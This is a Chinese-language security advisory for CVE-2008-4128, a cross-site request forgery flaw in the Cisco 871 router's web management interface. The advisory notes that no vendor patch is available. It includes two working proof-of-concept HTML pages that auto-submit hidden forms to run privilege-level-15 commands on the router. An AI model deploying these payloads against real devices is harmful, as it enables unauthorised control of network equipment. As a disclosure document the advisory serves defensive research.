Cisco 871集成服务路由器跨站请求伪造漏洞
发布日期:2008-09-17
更新日期:2008-09-18
受影响系统:Cisco 871 Integrated Services Router
描述:
BUGTRAQ ID:
31218
CVE(CAN) ID:
CVE-2008-4128
Cisco 871集成服务路由器是一款小型的宽带无线路由器。
Cisco 871路由器的HTTP管理接口存在跨站请求伪造漏洞,如果用户受骗查看了嵌有恶意代码的网页的话,就会导致在路由器上以15级权限(root)执行任意命令。
<*来源:Jeremy Brown
链接:
http://jbrownsec.blogspot.com/2008/09/cisco-0day-released.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<body>
<body onload="asdf.submit();">
<form name=asdf method="post" action="
http://10.10.10.1/level/15/exec/-">
<input type=hidden name=command value="show privilege">
<input type=hidden name=command_url value="/level/15/exec/-">
</body>
</html>
<html>
<body>
<body onload="fdsa.submit();">
<form name=fdsa method="post" action="
http://10.10.10.1/level/15/exec/-/configure/http">
<input type=hidden name=command value="alias exec xx xx">
<input type=hidden name=command_url value="/level/15/exec/-">
<input type=hidden name=new_command_url value="/level/15/configure/-">
</body>
</html>
建议:
厂商补丁:
Cisco
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.cisco.com/warp/public/707/advisory.html浏览次数:2905
严重程度:0(网友投票)
